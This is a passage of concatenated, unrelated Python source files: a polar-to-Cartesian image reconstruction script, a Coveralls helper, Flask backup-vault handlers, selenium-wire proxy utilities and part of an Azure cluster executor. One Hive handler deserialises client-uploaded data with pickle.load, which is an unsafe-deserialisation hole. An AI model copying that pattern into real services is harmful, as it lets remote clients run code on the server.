except:
print >>sys.stderr, "Bad parameter for xmax. Expected floating point or integer, got '%s' instead.\n" % xmax
parser.print_help(sys.stderr)
sys.exit()
try:
ymax = float(ymax)
except:
print >>sys.stderr, "Bad parameter for ymax. Expected floating point or integer, got '%s' instead.\n" % ymax
parser.print_help(sys.stderr)
sys.exit()
if args.size is None:
W_new = int(640 * sqrt((xmax - xmin) / (ymax - ymin)))
H_new = int(640 * sqrt((ymax - ymin) / (xmax - xmin)))
else:
try:
W_new, H_new = args.size.split(":")
except:
print >>sys.stderr, "Bad parameter for size. Expected colon-delimited pair of integers, got '%s' instead.\n" % args.size
parser.print_help(sys.stderr)
sys.exit()
try:
W_new = int(W_new)
except:
print >>sys.stderr, "Bad parameter for width. Expected integer, got '%s' instead.\n" % W_new
parser.print_help(sys.stderr)
sys.exit()
try:
H_new = int(H_new)
except:
print >>sys.stderr, "Bad parameter for width. Expected integer, got '%s' instead.\n" % H_new
parser.print_help(sys.stderr)
sys.exit()
dx = (xmax - xmin) / (W_new - 1)
dy = (ymax - ymin) / (H_new - 1)
if args.beta is not None:
try:
args.beta = float(args.beta)
except ValueError:
print >>sys.stderr, "Bad parameter for beta. Expected floating point or integer, got '%s' instead." % args.beta
sys.exit()
else:
args.beta = 2 * sqrt(dx * dy)
print >>msgout, u"Output array information:"
print >>msgout, u" %.5f ≤ x ≤ %.5f, W = %d, ∆x = %.5f" % \
(xmin, xmax, W_new, dx)
print >>msgout, u" %.5f ≤ y ≤ %.5f, H = %d, ∆y = %.5f" % \
(ymin, ymax, H_new, dy)
print >>msgout, u"Filter parameter: β = %.5f." % args.beta
N = linspace(0, H - 1, H)
N[H / 2 + 1:] -= H
R = linspace(rmin, rmax, W)
R, N = meshgrid(R, N)
mask = (abs(N) <= 2 * pi * R / args.beta) & (N != 0)
mult = zeros(R.shape)
mult[mask] = 2 * pi * R[mask] * \
sin(args.beta * N[mask] / (2 * pi * R[mask])) / (args.beta * N[mask])
mult[N == 0] = 1
filtered = ifft(fdata * mult, axis=0)
new_metadata = array((xmin, xmax, ymin, ymax))
class ProgressIndicator(object):
def __init__(self, done, progress=0, msgout=sys.stdout, msg="Progress"):
self.done = done
self.progress = 0
self.msgout = msgout
self.msg = msg
def __call__(self, increment=1):
self.progress += increment
print >>self.msgout, "%s: %.2f%% done.\r" % (
self.msg, self.progress * 100.0 / self.done),
self.msgout.flush()
def polar2cartesian(outcoords, rmin, rmax, thetamin, thetamax, inputshape, xmin, xmax, ymin, ymax, outputshape, progress=None):
# Coordinate transform for converting a polar array
# to Cartesian coordinates.
# 'outputshape' is a tuple containing the shape of the
# Cartesian array.
Hout, Wout = outputshape
Hin, Win = inputshape
dx = (xmax - xmin) / (Wout - 1)
dy = (ymax - ymin) / (Hout - 1)
dr = (rmax - rmin) / (Win - 1)
dtheta = (thetamax - thetamin) / (Hin - 1)
yk, xk = outcoords
x = xmin + xk * dx
y = ymin + yk * dy
r = sqrt(x ** 2 + y ** 2)
if x == 0 and y == 0:
theta = 0
else:
theta = arctan2(y, x)
thetak = (theta - thetamin) / dtheta
rk = (r - rmin) / dr
if progress and callable(progress):
progress()
return (thetak, rk)
progress = ProgressIndicator(
H_new * W_new, msgout=msgout, msg="Reconstructing to Cartesian grid")
kwargs = dict(outputshape=(H_new, W_new), inputshape=filtered.shape, xmin=xmin, xmax=xmax,
ymin=ymin, ymax=ymax, rmin=rmin, rmax=rmax, thetamin=thetamin, thetamax=thetamax, progress=progress)
t0 = time.time()
new_data = transform(filtered.real, polar2cartesian, order=3, output_shape=(
H_new, W_new), extra_keywords=kwargs)
print >>msgout, ""
print >>msgout, "Reconstruction done: %.2f seconds" % (time.time() - t0)
t0 = time.time()
print >>msgout, "Writing data to '%s'..." % args.output,
msgout.flush()
if args.output != "-":
outfile = open(args.output, "wb")
npsave(outfile, "data")
npsave(outfile, new_metadata)
npsave(outfile, new_data)
if outfile is not sys.stdout:
outfile.close()
print >>msgout, "%.2f seconds" % (time.time() - t0)
|
import webbrowser
from ..utils import coveralls_project_exists
def enable_coveralls(automatically_open_browser: bool):
"""Handle guided coveralls."""
if not coveralls_project_exists():
print("You still need to create the coveralls project.")
if automatically_open_browser:
input("Press enter to go to coveralls now.")
webbrowser.open("https://coveralls.io/repos/new",
new=2, autoraise=True)
|
import pickle
import shutil
from pathlib import Path
from flask import request, Response
from hive.settings import hive_setting
from hive.util.auth import did_auth
from hive.util.common import deal_dir, get_file_md5_info, gene_temp_file_name, get_file_checksum_list, \
create_full_path_dir
from hive.util.constants import HIVE_MODE_DEV, BACKUP_ACCESS, CHUNK_SIZE, VAULT_BACKUP_SERVICE_USE_STORAGE
from hive.util.did_file_info import filter_path_root, get_dir_size
from hive.util.error_code import BAD_REQUEST, UNAUTHORIZED, SUCCESS, NOT_FOUND, CHECKSUM_FAILED, \
SERVER_MKDIR_ERROR, FORBIDDEN, SERVER_SAVE_FILE_ERROR, SERVER_PATCH_FILE_ERROR, SERVER_MOVE_FILE_ERROR
from hive.util.flask_rangerequest import RangeRequest
from hive.util.payment.vault_backup_service_manage import get_vault_backup_service, get_vault_backup_path, \
update_vault_backup_service_item
from hive.util.payment.vault_service_manage import can_access_backup
from hive.util.pyrsync import patchstream, gene_blockchecksums, rsyncdelta
from hive.util.vault_backup_info import *
from hive.util.server_response import ServerResponse
from hive.main.interceptor import post_json_param_pre_proc, did_post_json_param_pre_proc, pre_proc, \
did_get_param_pre_proc
import logging
logger = logging.getLogger("HiveInternal")
class HiveInternal:
mode = HIVE_MODE_DEV
def __init__(self):
self.app = None
self.response = ServerResponse("HiveInternal")
self.backup_ftp = None
def init_app(self, app, mode):
backup_path = Path(hive_setting.BACKUP_VAULTS_BASE_DIR)
if not backup_path.exists:
create_full_path_dir(backup_path)
self.app = app
HiveInternal.mode = mode
def backup_save_finish(self):
did, content, err = did_post_json_param_pre_proc(self.response, "checksum_list")
if err:
return err
checksum_list = content["checksum_list"]
backup_path = get_vault_backup_path(did)
if not backup_path.exists():
return self.response.response_err(NOT_FOUND, f"{did} backup vault not found")
backup_checksum_list = get_file_checksum_list(backup_path)
for checksum in checksum_list:
if checksum not in backup_checksum_list:
return self.response.response_err(CHECKSUM_FAILED, f"{did} backup file checksum failed")
total_size = 0.0
total_size = get_dir_size(backup_path.as_posix(), total_size)
update_vault_backup_service_item(did, VAULT_BACKUP_SERVICE_USE_STORAGE, total_size)
return self.response.response_ok()
def backup_restore_finish(self):
did, content, err = did_post_json_param_pre_proc(self.response)
if err:
return err
backup_path = get_vault_backup_path(did)
if not backup_path.exists():
return self.response.response_err(NOT_FOUND, f"{did} backup vault not found")
backup_checksum_list = get_file_checksum_list(backup_path)
data = {"checksum_list": backup_checksum_list}
return self.response.response_ok(data)
def get_backup_service(self):
did, content, err = did_get_param_pre_proc(self.response)
if err:
return self.response.response_err(UNAUTHORIZED, "Backup internal backup_communication_start auth failed")
# check backup service exist
info = get_vault_backup_service(did)
if not info:
return self.response.response_err(BAD_REQUEST, "There is no backup service of " + did)
backup_path = get_vault_backup_path(did)
if not backup_path.exists():
create_full_path_dir(backup_path)
del info["_id"]
data = {"backup_service": info}
return self.response.response_ok(data)
def get_backup_files(self):
did, content, err = did_get_param_pre_proc(self.response, access_backup=BACKUP_ACCESS)
if err:
return self.response.response_err(UNAUTHORIZED, "Backup internal get_transfer_files auth failed")
backup_path = get_vault_backup_path(did)
if not backup_path.exists():
self.response.response_ok({"backup_files": list()})
file_md5_gene = deal_dir(backup_path.as_posix(), get_file_md5_info)
file_md5_list = list()
for md5 in file_md5_gene:
md5_info = [md5[0], Path(md5[1]).relative_to(backup_path).as_posix()]
file_md5_list.append(md5_info)
return self.response.response_ok({"backup_files": file_md5_list})
def put_file(self):
did, content, response = did_get_param_pre_proc(self.response, "file", access_backup=BACKUP_ACCESS)
if response is not None:
return response
file_name = filter_path_root(content["file"])
backup_path = get_vault_backup_path(did)
full_path_name = (backup_path / file_name).resolve()
if not full_path_name.parent.exists():
if not create_full_path_dir(full_path_name.parent):
return self.response.response_err(SERVER_MKDIR_ERROR,
"internal put_file error to create dir:" + full_path_name.parent.as_posix())
temp_file = gene_temp_file_name()
try:
with open(temp_file, "bw") as f:
chunk_size = CHUNK_SIZE
while True:
chunk = request.stream.read(chunk_size)
if len(chunk) == 0:
break
f.write(chunk)
except Exception as e:
logger.error(f"exception of put_file error is {str(e)}")
return self.response.response_err(SERVER_SAVE_FILE_ERROR, f"Exception: {str(e)}")
if full_path_name.exists():
full_path_name.unlink()
shutil.move(temp_file.as_posix(), full_path_name.as_posix())
return self.response.response_ok()
def __get_backup_file_check(self, resp):
did, app_id = did_auth()
if did is None:
resp.status_code = UNAUTHORIZED
return resp, None
r, msg = can_access_backup(did)
if r != SUCCESS:
resp.status_code = r
return resp, None
file_name = request.args.get('file')
file_name = filter_path_root(file_name)
backup_path = get_vault_backup_path(did)
file_full_name = (backup_path / file_name).resolve()
if not file_full_name.exists():
resp.status_code = NOT_FOUND
return resp, None
if not file_full_name.is_file():
resp.status_code = FORBIDDEN
return resp, None
return resp, file_full_name
def get_file(self):
resp = Response()
resp, file_full_name = self.__get_backup_file_check(resp)
if not file_full_name:
return resp
size = file_full_name.stat().st_size
with open(file_full_name, 'rb') as f:
etag = RangeRequest.make_etag(f)
last_modified = datetime.utcnow()
data = RangeRequest(open(file_full_name, 'rb'),
etag=etag,
last_modified=last_modified,
size=size).make_response()
return data
def move_file(self, is_copy):
did, content, response = did_post_json_param_pre_proc(self.response, "src_file", "dst_file",
access_backup=BACKUP_ACCESS)
if response is not None:
return response
src_name = content.get('src_file')
src_name = filter_path_root(src_name)
dst_name = content.get('dst_file')
dst_name = filter_path_root(dst_name)
backup_path = get_vault_backup_path(did)
src_full_path_name = (backup_path / src_name).resolve()
dst_full_path_name = (backup_path / dst_name).resolve()
if not src_full_path_name.exists():
return self.response.response_err(NOT_FOUND, "src_name not exists")
if dst_full_path_name.exists():
dst_full_path_name.unlink()
dst_parent_folder = dst_full_path_name.parent
if not dst_parent_folder.exists():
if not create_full_path_dir(dst_parent_folder):
return self.response.response_err(SERVER_MKDIR_ERROR, "move_file make dst parent path dir error")
try:
if is_copy:
shutil.copy2(src_full_path_name.as_posix(), dst_full_path_name.as_posix())
else:
shutil.move(src_full_path_name.as_posix(), dst_full_path_name.as_posix())
except Exception as e:
logger.error(f"exception of move_file error is {str(e)}")
return self.response.response_err(SERVER_MOVE_FILE_ERROR, "Exception:" + str(e))
return self.response.response_ok()
def delete_file(self):
did, content, response = did_get_param_pre_proc(self.response, "file", access_backup=BACKUP_ACCESS)
if response is not None:
return response
file_name = content.get('file')
file_name = filter_path_root(file_name)
backup_path = get_vault_backup_path(did)
full_path_name = (backup_path / file_name).resolve()
if full_path_name.exists():
full_path_name.unlink()
# todo delete all empty path dir
return self.response.response_ok()
def get_file_patch_hash(self):
resp = Response()
resp, file_full_name = self.__get_backup_file_check(resp)
if not file_full_name:
return resp
open_file = open(file_full_name, 'rb')
resp = Response(gene_blockchecksums(open_file, blocksize=CHUNK_SIZE))
resp.status_code = SUCCESS
return resp
def patch_file_delta(self):
resp = Response()
resp, file_full_name = self.__get_backup_file_check(resp)
if not file_full_name:
return resp
patch_delta_file = gene_temp_file_name()
try:
with open(patch_delta_file, "bw") as f:
chunk_size = CHUNK_SIZE
while True:
chunk = request.stream.read(chunk_size)
if len(chunk) == 0:
break
f.write(chunk)
except Exception as e:
logger.error(f"exception of post_file_patch_delta read error is {str(e)}")
resp.status_code = SERVER_SAVE_FILE_ERROR
return resp
with open(patch_delta_file, "rb") as f:
delta_list = pickle.load(f)
try:
new_file = gene_temp_file_name()
with open(file_full_name, "br") as unpatched:
with open(new_file, "bw") as save_to:
unpatched.seek(0)
patchstream(unpatched, save_to, delta_list)
patch_delta_file.unlink()
if file_full_name.exists():
file_full_name.unlink()
shutil.move(new_file.as_posix(), file_full_name.as_posix())
except Exception as e:
logger.error(f"exception of post_file_patch_delta patch error is {str(e)}")
resp.status_code = SERVER_PATCH_FILE_ERROR
return resp
resp.status_code = SUCCESS
return resp
def get_file_delta(self):
resp = Response()
resp, file_full_name = self.__get_backup_file_check(resp)
if not file_full_name:
return resp
data = request.get_data()
lines = data.split(b'\n')
hashes = list()
for line in lines:
if not line:
continue
data = line.split(b',')
h = (int(data[0]), data[1].decode("utf-8"))
hashes.append(h)
with open(file_full_name, "rb") as f:
delta_list = rsyncdelta(f, hashes, blocksize=CHUNK_SIZE)
patch_delta_file = gene_temp_file_name()
try:
with open(patch_delta_file, "wb") as f:
pickle.dump(delta_list, f)
except Exception as e:
logging.getLogger("HiveBackup").error(
f"get_file_delta dump {file_full_name} delta exception:{str(e)}")
patch_delta_file.unlink()
resp.status_code = SERVER_SAVE_FILE_ERROR
return resp
size = patch_delta_file.stat().st_size
with open(patch_delta_file, 'rb') as f:
etag = RangeRequest.make_etag(f)
last_modified = datetime.utcnow()
data = RangeRequest(open(patch_delta_file, 'rb'),
etag=etag,
last_modified=last_modified,
size=size).make_response()
patch_delta_file.unlink()
print("patch file name:" + patch_delta_file.as_posix())
return data
|
import collections.abc
import logging
import os
import pkgutil
from collections import namedtuple
from urllib.request import _parse_proxy
log = logging.getLogger(__name__)
def get_upstream_proxy(options):
"""Get the upstream proxy configuration from the options dictionary.
This will be overridden with any configuration found in the environment
variables HTTP_PROXY, HTTPS_PROXY, NO_PROXY
The configuration will be returned as a dictionary with keys 'http',
'https' and 'no_proxy'. The value of the 'http' and 'https' keys will
be a named tuple with the attributes:
scheme, username, password, hostport
Note that the keys will only be present in the dictionary when relevant
proxy configuration exists.
Args:
options: The selenium wire options.
Returns: A dictionary.
"""
proxy_options = (options or {}).pop('proxy', {})
http_proxy = os.environ.get('HTTP_PROXY')
https_proxy = os.environ.get('HTTPS_PROXY')
no_proxy = os.environ.get('NO_PROXY')
merged = {}
if http_proxy:
merged['http'] = http_proxy
if https_proxy:
merged['https'] = https_proxy
if no_proxy:
merged['no_proxy'] = no_proxy
merged.update(proxy_options)
conf = namedtuple('ProxyConf', 'scheme username password hostport')
for proxy_type in ('http', 'https'):
# Parse the upstream proxy URL into (scheme, username, password, hostport)
# for ease of access.
if merged.get(proxy_type) is not None:
merged[proxy_type] = conf(*_parse_proxy(merged[proxy_type]))
return merged
def extract_cert(cert_name='ca.crt'):
"""Extracts the root certificate to the current working directory."""
try:
cert = pkgutil.get_data(__package__, cert_name)
except FileNotFoundError:
log.error("Invalid certificate '{}'".format(cert_name))
else:
with open(os.path.join(os.getcwd(), cert_name), 'wb') as out:
out.write(cert)
log.info('{} extracted. You can now import this into a browser.'.format(
cert_name))
def is_list_alike(container):
return (isinstance(container, collections.abc.Sequence) and not
isinstance(container, str))
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import collections
import json
import os
import secrets
import shutil
import string
import threading
import time
from multiprocessing.pool import ThreadPool
import yaml
from maro.cli.grass.executors.grass_executor import GrassExecutor
from maro.cli.grass.utils.file_synchronizer import FileSynchronizer
from maro.cli.grass.utils.master_api_client import MasterApiClientV1
from maro.cli.grass.utils.params import ContainerStatus, GrassParams, GrassPaths, NodeStatus
from maro.cli.utils.azure_controller import AzureController
from maro.cli.utils.deployment_validator import DeploymentValidator
from maro.cli.utils.details_reader import DetailsReader
from maro.cli.utils.details_writer import DetailsWriter
from maro.cli.utils.name_creator import NameCreator
from maro.cli.utils.params import GlobalParams, GlobalPaths
from maro.utils.exception.cli_exception import BadRequestError
from maro.utils.logger import CliLogger
logger = CliLogger(name=__name__)
class GrassAzureExecutor(GrassExecutor):
"""Executor for grass/azure mode.
See https://maro.readthedocs.io/en/latest/key_components/orchestration.html for reference.
"""
def __init__(self, cluster_name: str):
super().__init__(cluster_details=DetailsReader.load_cluster_details(cluster_name=cluster_name))
# Cloud configs
self.subscription = self.cluster_details["cloud"]["subscription"]
self.resource_group = self.cluster_details["cloud"]["resource_group"]
self.location = self.cluster_details["cloud"]["location"]
self.default_username = self.cluster_details["cloud"]["default_username"]
# Connection configs
self.ssh_port = self.cluster_details["connection"]["ssh"]["port"]
self.api_server_port = self.cluster_details["connection"]["api_server"]["port"]
# maro grass create
@staticmethod
def create(create_deployment: dict) -> None:
"""Create MARO Cluster with create_deployment.
Args:
create_deployment (dict): create_deployment of grass/azure. See lib/deployments/internal for reference.
Returns:
None.
"""
logger.info("Creating cluster")
# Get standardized cluster_details
cluster_details = GrassAzureExecutor._standardize_cluster_details(create_deployment=create_deployment)
cluster_name = cluster_details["name"]
if os.path.isdir(f"{GlobalPaths.ABS_MARO_CLUSTERS}/{cluster_name}"):
raise BadRequestError(f"Cluster '{cluster_name}' is exist")
# Start creating
try:
GrassAzureExecutor._create_resource_group(cluster_details=cluster_details)
GrassAzureExecutor._create_vnet(cluster_details=cluster_details)
# Simultaneously capture image and init master
build_node_image_thread = threading.Thread(
target=GrassAzureExecutor._build_node_image,
args=(cluster_details,)
)
build_node_image_thread.start()
create_and_init_master_thread = threading.Thread(
target=GrassAzureExecutor._create_and_init_master,
args=(cluster_details,)
)
create_and_init_master_thread.start()
build_node_image_thread.join()
create_and_init_master_thread.join()
# local save cluster after initialization
DetailsWriter.save_cluster_details(cluster_name=cluster_name, cluster_details=cluster_details)
except Exception as e:
# If failed, remove details folder, then raise
shutil.rmtree(path=f"{GlobalPaths.ABS_MARO_CLUSTERS}/{cluster_name}")
logger.error_red(f"Failed to create cluster '{cluster_name}'")
raise e
logger.info_green(f"Cluster '{cluster_name}' is created")
@staticmethod
def _standardize_cluster_details(create_deployment: dict) -> dict:
"""Standardize cluster_details from create_deployment.
We use create_deployment to build cluster_details (they share the same keys structure).
Args:
create_deployment (dict): create_deployment of grass/azure. See lib/deployments/internal for reference.
Returns:
dict: standardized cluster_details.
"""
samba_password = "".join(secrets.choice(string.ascii_letters + string.digits) for _ in range(20))
optional_key_to_value = {
"root['master']['redis']": {"port": GlobalParams.DEFAULT_REDIS_PORT},
"root['master']['redis']['port']": GlobalParams.DEFAULT_REDIS_PORT,
"root['master']['fluentd']": {"port": GlobalParams.DEFAULT_FLUENTD_PORT},
"root['master']['fluentd']['port']": GlobalParams.DEFAULT_FLUENTD_PORT,
"root['master']['samba']": {"password": samba_password},
"root['master']['samba']['password']": samba_password,
"root['connection']": {
"ssh": {"port": GlobalParams.DEFAULT_SSH_PORT},
"api_server": {"port": GrassParams.DEFAULT_API_SERVER_PORT},
},
"root['connection']['ssh']": {"port": GlobalParams.DEFAULT_SSH_PORT},
"root['connection']['ssh']['port']": GlobalParams.DEFAULT_SSH_PORT,
"root['connection']['api_server']": {"port": GrassParams.DEFAULT_API_SERVER_PORT},
"root['connection']['api_server']['port']": GrassParams.DEFAULT_API_SERVER_PORT
}
with open(f"{GrassPaths.ABS_MARO_GRASS_LIB}/deployments/internal/grass_azure_create.yml") as fr:
create_deployment_template = yaml.safe_load(fr)
DeploymentValidator.validate_and_fill_dict(
template_dict=create_deployment_template,
actual_dict=create_deployment,
optional_key_to_value=optional_key_to_value
)
# Init runtime fields.
create_deployment["id"] = NameCreator.create_cluster_id()
return create_deployment
@staticmethod
def _create_resource_group(cluster_details: dict) -> None:
"""Create the resource group if it does not exist.
Args:
cluster_details (dict): details of the cluster.
Returns:
None.
"""
# Load params
subscription = cluster_details["cloud"]["subscription"]
resource_group = cluster_details["cloud"]["resource_group"]
# Check if Azure CLI is installed, and print version
version_details = AzureController.get_version()
logger.info_green(f"Your Azure CLI version: {version_details['azure-cli']}")
# Set subscription id
AzureController.set_subscription(subscription=subscription)
logger.info_green(f"Set subscription to '{subscription}'")
# Check and create resource group
resource_group_details = AzureController.get_resource_group(resource_group=resource_group)
if resource_group_details:
logger.warning_yellow(f"Azure resource group '{resource_group}' already exists")
else:
AzureController.create_resource_group(
resource_group=resource_group,
location=cluster_details["cloud"]["location"]
)
logger.info_green(f"Resource group '{resource_group}' is created")
@staticmethod
def _create_vnet(cluster_details: dict) -> None:
"""Create vnet for the MARO Cluster.
Args:
cluster_details (dict): details of the MARO Cluster.
Returns:
None.
"""
logger.info("Creating vnet")
# Create ARM parameters and start deployment
template_file_path = f"{GrassPaths.ABS_MARO_GRASS_LIB}/modes/azure/create_vnet/template.json"
parameters_file_path = (
f"{GlobalPaths.ABS_MARO_CLUSTERS}/{cluster_details['name']}/vnet/arm_create_vnet_parameters.json"
)
ArmTemplateParameterBuilder.create_vnet(
cluster_details=cluster_details,
export_path=parameters_file_path
)
AzureController.start_deployment(
resource_group=cluster_details["cloud"]["resource_group"],
deployment_name="vnet",
template_file_path=template_file_path,
parameters_file_path=parameters_file_path
)
logger.info_green("Vnet is created")
@staticmethod
def _build_node_image(cluster_details: dict) -> None:
"""Build Azure Image for MARO Node.
The built image will contain required Node runtime environment including GPU support.
See https://docs.microsoft.com/en-us/azure/virtual-machines/linux/capture-image for reference.
Args:
cluster_details (dict): details of the MARO Cluster.
Returns:
None.
"""
logger.info("Building MARO Node image")
# Build params
resource_name = "build-node-image"
image_name = f"{cluster_details['id']}-node-image"
vm_name = f"{cluster_details['id']}-{resource_name}-vm"
# Create ARM parameters and start deployment.
# For simplicity, we use master_node_size as the size of build_node_image_vm here
template_file_path = f"{GrassPaths.ABS_MARO_GRASS_LIB}/modes/azure/create_build_node_image_vm/template.json"
parameters_file_path = (
f"{GlobalPaths.ABS_MARO_CLUSTERS}/{cluster_details['name']}"
f"/build_node_image_vm/arm_create_build_node_image_vm_parameters.json"
)
ArmTemplateParameterBuilder.create_build_node_image_vm(
cluster_details=cluster_details,
node_size=cluster_details["master"]["node_size"],
export_path=parameters_file_path
)
AzureController.start_deployment(
resource_group=cluster_details["cloud"]["resource_group"],
deployment_name=resource_name,
template_file_path=template_file_path,
parameters_file_path=parameters_file_path
)
# Gracefully wait
time.sleep(10)
# Get public ip address
ip_addresses = AzureController.list_ip_addresses(
resource_group=cluster_details["cloud"]["resource_group"],
vm_name=vm_name
)
public_ip_address = ip_addresses[0]["virtualMachine"]["network"]["publicIpAddresses"][0]["ipAddress"]
# Make sure build_node_image_vm is able to connect
GrassAzureExecutor.retry_connection(
node_username=cluster_details["cloud"]["default_username"],
node_hostname=public_ip_address,
node_ssh_port=cluster_details["connection"]["ssh"]["port"]
)
# Run init image script
FileSynchronizer.copy_files_to_node(
local_path=f"{GrassPaths.MARO_GRASS_LIB}/scripts/build_node_image_vm/init_build_node_image_vm.py",
remote_dir="~/",
node_username=cluster_details["cloud"]["default_username"],
node_hostname=public_ip_address,
node_ssh_port=cluster_details["connection"]["ssh"]["port"]
)
GrassAzureExecutor.remote_init_build_node_image_vm(
node_username=cluster_details["cloud"]["default_username"],
node_hostname=public_ip_address,
node_ssh_port=cluster_details["connection"]["ssh"]["port"]
)
# Extract image
AzureController.deallocate_vm(resource_group=cluster_details["cloud"]["resource_group"], vm_name=vm_name)
AzureController.generalize_vm(resource_group=cluster_details["cloud"]["resource_group"], vm_name=vm_name)
AzureController.create_image_from_vm(
resource_group=cluster_details["cloud"]["resource_group"],
image_name=image_name,
vm_name=vm_name
)
# Delete resources
GrassAzureExecutor._delete_resources(
resource_group=cluster_details["cloud"]["resource_group"],
resource_name=resource_name,
cluster_id=cluster_details["id"]
)
logger.info_green("MARO Node Image is built")
@staticmethod
def _create_and_init_master(cluster_details: dict) -> None:
"""Create and init MARO Master.
Args:
cluster_details (dict): details of the MARO Cluster.
Returns:
None.
"""
logger.info("Creating MARO Master")
GrassAzureExecutor._create_master_vm(cluster_details=cluster_details)
GrassAzureExecutor._init_master(cluster_details=cluster_details)
GrassAzureExecutor._create_user(cluster_details=cluster_details)
# Remote create master, cluster after initialization
master_api_client = MasterApiClientV1(
master_hostname=cluster_details["master"]["public_ip_address"],
master_api_server_port=cluster_details["master"]["api_server"]["port"],
user_id=cluster_details["user"]["id"],
master_to_dev_encryption_private_key=cluster_details["user"]["master_to_dev_encryption_private_key"],
dev_to_master_encryption_public_key=cluster_details["user"]["dev_to_master_encryption_public_key"],
dev_to_master_signing_private_key=cluster_details["user"]["dev_to_master_signing_private_key"]
)
master_api_client.create_master(master_details=cluster_details["master"])
master_api_client.create_cluster(cluster_details=cluster_details)
logger.info_green("MARO Master is created")
@staticmethod
def _create_master_vm(cluster_details: dict) -> None:
"""Create MARO Master VM.
Args:
cluster_details (dict): details of the MARO Cluster.
Returns:
None.
"""
logger.info("Creating Master VM")
# Build params
vm_name = f"{cluster_details['id']}-master-vm"
# Create ARM parameters and start deployment
template_file_path = f"{GrassPaths.ABS_MARO_GRASS_LIB}/modes/azure/create_master/template.json"
parameters_file_path = (
f"{GlobalPaths.ABS_MARO_CLUSTERS}/{cluster_details['name']}"
f"/master/arm_create_master_parameters.json"
)
ArmTemplateParameterBuilder.create_master(
cluster_details=cluster_details,
node_size=cluster_details["master"]["node_size"],
export_path=parameters_file_path
)
AzureController.start_deployment(
resource_group=cluster_details["cloud"]["resource_group"],
deployment_name="master",
template_file_path=template_file_path,
parameters_file_path=parameters_file_path
)
# Get master IP addresses
ip_addresses = AzureController.list_ip_addresses(
resource_group=cluster_details["cloud"]["resource_group"],
vm_name=vm_name
)
public_ip_address = ip_addresses[0]["virtualMachine"]["network"]["publicIpAddresses"][0]["ipAddress"]
private_ip_address = ip_addresses[0]["virtualMachine"]["network"]["privateIpAddresses"][0]
# Get other params and fill them to master_details
hostname = vm_name
username = cluster_details["cloud"]["default_username"]
cluster_details["master"]["hostname"] = hostname
cluster_details["master"]["username"] = username
cluster_details["master"]["public_ip_address"] = public_ip_address
cluster_details["master"]["private_ip_address"] = private_ip_address
cluster_details["master"]["resource_name"] = vm_name
cluster_details["master"]["ssh"] = {"port": cluster_details["connection"]["ssh"]["port"]}
cluster_details["master"]["api_server"] = {"port": cluster_details["connection"]["api_server"]["port"]}
logger.info_green(f"You can login to your master node with: {username}@{public_ip_address}")
logger.info_green("Master VM is created")
# maro grass delete
def delete(self) -> None:
"""Delete the MARO Cluster.
Returns:
None.
"""
logger.info(f"Deleting cluster '{self.cluster_name}'")
# Get resource list
resource_list = AzureController.list_resources(resource_group=self.resource_group)
# Filter resources
deletable_ids = []
for resource_info in resource_list:
if resource_info["name"].startswith(self.cluster_id):
deletable_ids.append(resource_info["id"])
# Delete resources
if len(deletable_ids) > 0:
AzureController.delete_resources(resource_ids=deletable_ids)
# Delete cluster folder
shutil.rmtree(f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}")
logger.info_green(f"Cluster '{self.cluster_name}' is deleted")
# maro grass node
def scale_node(self, replicas: int, node_size: str):
"""Scale up/down MARO Node using predefined Node Image.
Args:
replicas (int): desired number of MARO Node in specific node_size.
node_size (str): size of the MARO Node VM, see https://docs.microsoft.com/en-us/azure/virtual-machines/sizes
for reference.
Returns:
None.
"""
# Load details
nodes_details = self.master_api_client.list_nodes()
# Init node_size_to_count
node_size_to_count = collections.defaultdict(lambda: 0)
for node_details in nodes_details:
node_size_to_count[node_details["node_size"]] += 1
# Get node_size_to_spec
node_size_to_spec = self._get_node_size_to_spec()
if node_size not in node_size_to_spec:
raise BadRequestError(f"Invalid node_size '{node_size}'")
# Scale nodes
if node_size_to_count[node_size] > replicas:
self._delete_nodes(
num=node_size_to_count[node_size] - replicas,
node_size=node_size
)
elif node_size_to_count[node_size] < replicas:
self._create_nodes(
num=replicas - node_size_to_count[node_size],
node_size=node_size
)
else:
logger.warning_yellow("Replica is match, no create or delete")
def _create_nodes(self, num: int, node_size: str) -> None:
"""Create MARO Nodes in parallel.
Args:
num (int): number of MARO Nodes (with specific node_size) to create.
node_size (str): size of the MARO Node VM.
Returns:
None.
"""
logger.info(f"Scaling up {num}")
# Parallel create
with ThreadPool(GlobalParams.PARALLELS) as pool:
pool.starmap(
self._create_node,
[[node_size]] * num
)
def _create_node(self, node_size: str) -> None:
"""Create a MARO Node.
Args:
node_size (str): size of the MARO Node VM.
Returns:
None.
"""
# Generate node name
node_name = NameCreator.create_node_name()
logger.info(message=f"Creating node '{node_name}'")
# Create node
join_cluster_deployment = self._create_vm(
node_name=node_name,
node_size=node_size
)
# Start joining cluster
self._join_cluster(node_details=join_cluster_deployment["node"])
logger.info_green(message=f"Node '{node_name}' is created")
def _delete_nodes(self, num: int, node_size: str) -> None:
"""Delete MARO Nodes in parallel.
Args:
num (int): number of MARO Nodes (with specific node_size) to delete.
node_size (str): size of the MARO Node VM.
Returns:
None.
"""
# Load details
nodes_details = self.master_api_client.list_nodes()
# Get deletable_nodes and check, TODO: consider to add -f
deletable_nodes = []
for node_details in nodes_details:
if node_details["node_size"] == node_size and len(node_details["containers"]) == 0:
deletable_nodes.append(node_details["name"])
if len(deletable_nodes) >= num:
logger.info(f"Scaling down {num}")
# Parallel delete
params = [[deletable_node] for deletable_node in deletable_nodes[:num]]
with ThreadPool(GlobalParams.PARALLELS) as pool:
pool.starmap(
self._delete_node,
params
)
else:
logger.warning_yellow(
"Unable to scale down.\n"
f"Only {len(deletable_nodes)} nodes are deletable, but need to delete {num} to meet the replica"
)
def _create_vm(self, node_name: str, node_size: str) -> dict:
"""Create MARO Node VM.
Args:
node_name (str): name of the MARO Node. Also the id of the MARO Node.
node_size (str): size of the MARO Node VM.
Returns:
dict: join_cluster_deployment that needed in "join cluster" operation.
See /lib/scripts/join_cluster.py for reference.
"""
logger.info(message=f"Creating VM '{node_name}'")
# Create ARM parameters and start deployment
os.makedirs(name=f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/nodes/{node_name}", exist_ok=True)
template_file_path = f"{GrassPaths.ABS_MARO_GRASS_LIB}/modes/azure/create_node/template.json"
parameters_file_path = (
f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/nodes/{node_name}/arm_create_node_parameters.json"
)
ArmTemplateParameterBuilder.create_node(
